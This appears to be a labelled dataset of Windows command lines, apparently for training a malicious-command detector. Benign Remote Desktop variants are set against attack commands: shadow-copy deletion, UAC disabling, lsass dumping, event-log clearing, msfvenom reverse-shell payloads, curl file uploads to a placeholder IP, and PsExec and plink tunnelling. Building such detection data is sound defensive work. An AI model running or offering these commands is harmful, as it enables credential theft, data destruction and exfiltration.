1	mstsc /v:${ip_address}
1	cmd /c "mstsc /v:${ip_address}"
1	powershell -c "mstsc /v:${ip_address}"
1	mstsc.exe /v:${ip_address}
1	cmd /c "mstsc.exe /v:${ip_address}"
1	powershell -c "mstsc.exe /v:${ip_address}"
1	mstsc /v:${ip_address} /f
1	cmd /c "mstsc /v:${ip_address} /f"
1	powershell -c "mstsc /v:${ip_address} /f"
1	mstsc.exe /v:${ip_address} /f
1	cmd /c "mstsc.exe /v:${ip_address} /f"
1	powershell -c "mstsc.exe /v:${ip_address} /f"
1	mstsc /v:${ip_address} /public
1	cmd /c "mstsc /v:${ip_address} /public"
1	powershell -c "mstsc /v:${ip_address} /public"
1	mstsc.exe /v:${ip_address} /public
1	cmd /c "mstsc.exe /v:${ip_address} /public"
1	powershell -c "mstsc.exe /v:${ip_address} /public"
1	mstsc /v:${ip_address} /f /public
1	cmd /c "mstsc /v:${ip_address} /f /public"
1	powershell -c "mstsc /v:${ip_address} /f /public"
1	mstsc.exe /v:${ip_address} /f /public
1	cmd /c "mstsc.exe /v:${ip_address} /f /public"
1	powershell -c "mstsc.exe /v:${ip_address} /f /public"
1	mstsc /v:${ip_address} /admin
1	cmd /c "mstsc /v:${ip_address} /admin"
1	powershell -c "mstsc /v:${ip_address} /admin"
1	mstsc.exe /v:${ip_address} /admin
1	cmd /c "mstsc.exe /v:${ip_address} /admin"
1	powershell -c "mstsc.exe /v:${ip_address} /admin"
1	mstsc /v:${ip_address} /f /admin
1	cmd /c "mstsc /v:${ip_address} /f /admin"
1	powershell -c "mstsc /v:${ip_address} /f /admin"
1	mstsc.exe /v:${ip_address} /f /admin
1	cmd /c "mstsc.exe /v:${ip_address} /f /admin"
1	powershell -c "mstsc.exe /v:${ip_address} /f /admin"
1	mstsc /v:${ip_address} /restrictedAdmin
1	cmd /c "mstsc /v:${ip_address} /restrictedAdmin"
1	powershell -c "mstsc /v:${ip_address} /restrictedAdmin"
1	mstsc.exe /v:${ip_address} /restrictedAdmin
1	cmd /c "mstsc.exe /v:${ip_address} /restrictedAdmin"
1	powershell -c "mstsc.exe /v:${ip_address} /restrictedAdmin"
1	mstsc /v:${ip_address} /f /restrictedAdmin
1	cmd /c "mstsc /v:${ip_address} /f /restrictedAdmin"
1	powershell -c "mstsc /v:${ip_address} /f /restrictedAdmin"
1	mstsc.exe /v:${ip_address} /f /restrictedAdmin
1	cmd /c "mstsc.exe /v:${ip_address} /f /restrictedAdmin"
1	powershell -c "mstsc.exe /v:${ip_address} /f /restrictedAdmin"
1	mstsc /v:${ip_address} /remoteGuard
1	cmd /c "mstsc /v:${ip_address} /remoteGuard"
1	powershell -c "mstsc /v:${ip_address} /remoteGuard"
1	mstsc.exe /v:${ip_address} /remoteGuard
1	cmd /c "mstsc.exe /v:${ip_address} /remoteGuard"
1	powershell -c "mstsc.exe /v:${ip_address} /remoteGuard"
1	mstsc /v:${ip_address} /f /remoteGuard
1	cmd /c "mstsc /v:${ip_address} /f /remoteGuard"
1	powershell -c "mstsc /v:${ip_address} /f /remoteGuard"
1	mstsc.exe /v:${ip_address} /f /remoteGuard
1	cmd /c "mstsc.exe /v:${ip_address} /f /remoteGuard"
1	powershell -c "mstsc.exe /v:${ip_address} /f /remoteGuard"
1	mstsc /v:${ip_address} /multimon
1	cmd /c "mstsc /v:${ip_address} /multimon"
1	powershell -c "mstsc /v:${ip_address} /multimon"
1	mstsc.exe /v:${ip_address} /multimon
0	sdelete -f ${local_file_path}
0	powershell -c "7z a -slt ${destination_file_path} ${source_file_path} -p"
0	vssadmin.exe delete shadows /All /Quiet
0	cmd /c "sdelete.exe -s ${local_file_path}"
0	powershell -c "plink -ssh -l ${username} -pw ${password} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}"
0	certutil -encode -Unicode -gmt -v -f error.txt encode.txt
0	powershell -c "taskkill.exe /F /im ${process_name}"
0	cmd /c "arp.exe -g"
0	powershell -c "arp -g"
0	cmd /c "vssadmin Delete Shadows /All /Quiet"
0	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_QWORD /d 0 /f
0	vssadmin delete shadows /all /quiet
0	del /f /p ${local_file_path}
0	nmap -p- -sC -O -A ${ip_address}
0	nmap -v ${ip_address} 2> error.log
0	cmd /c "Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d -s"
0	cmd /c "certutil -encode -UnicodeText -v error.txt encode.txt"
0	cmd /c "7z a -p${password} ${destination_file_path} ${source_file_path}"
0	powershell -c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_MULTI_SZ /f"
0	powershell -c "curl.exe -X POST http://${ip_address}/upload -F 'files=@${source_file_path}'"
0	powershell -c "certutil -encode -Unicode -v -f error.txt encode.txt"
0	cmd /c "netstat.exe"
0	powershell -c "sdelete -s ${local_file_path}"
0	powershell -c "plink.exe -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}"
0	powershell -c "curl -v -X POST -F file=@${source_file_path} http://${ip_address}:${port}/upload"
0	powershell -c "msfvenom -p windows/x64/meterpreter/reverse_winhttp LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
0	cmd /c "certutil -encode -UnicodeText -gmt error.txt encode.txt"
0	cmd /c "reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD_LITTLE_ENDIAN /d 0 /f"
0	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD_LITTLE_ENDIAN /d 0 /f
0	vssadmin create shadow /for=C:
0	choco install -y psexec
0	cmd /c "certutil -encode -UnicodeText -gmt -v error.txt encode.txt"
0	Psexec64.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d
0	cmd /c "vssadmin delete shadows /All"
0	wmic.exe os get Version
0	powershell -c "plink.exe -ssh ${username}@${ip_address} -l ${username} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N"
0	powershell -c "msfvenom -p windows/x64/meterpreter/reverse_https LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
0	Psexec64.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d
0	plink -ssh -l ${username} -pw ${password} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}
0	reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_MULTI_SZ /f
0	vssadmin create shadow /for=C:
0	cmd /c "choco install putty"
0	cmd /c "choco install psexec"
0	powershell -c "sc.exe stop ${service_name}"
0	cmd /c "taskkill.exe /F /im ${process_name} /T"
0	cmd /c "ipconfig /allcompartments"
0	Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d
0	taskkill.exe /im ${process_name}
0	msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
0	powershell -c "wmic shadowcopy call create Volume=C:"
0	powershell -c "reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_QWORD /d 0 /f"
0	cmd /c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_MULTI_SZ /f"
0	cmd /c "certutil -encode -Unicode -gmt -v -f error.txt encode.txt"
0	powershell -c "7z a -slp -p${password} ${destination_file_path} ${source_file_path}"
0	powershell -c "vssadmin create shadow /for=C:"
0	vssadmin.exe delete shadows /all
0	powershell -c "choco install -f ngrok"
0	powershell -c "procdump.exe -accepteula -ma lsass lsassdump.dmp"
0	powershell -c "systeminfo"
0	del /p ${local_file_path}
0	wevtutil.exe clear-log security
0	choco install -f Megasync
0	cmd /c "choco install putty"
0	cmd /c "msfvenom -p windows/meterpreter/reverse_http LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
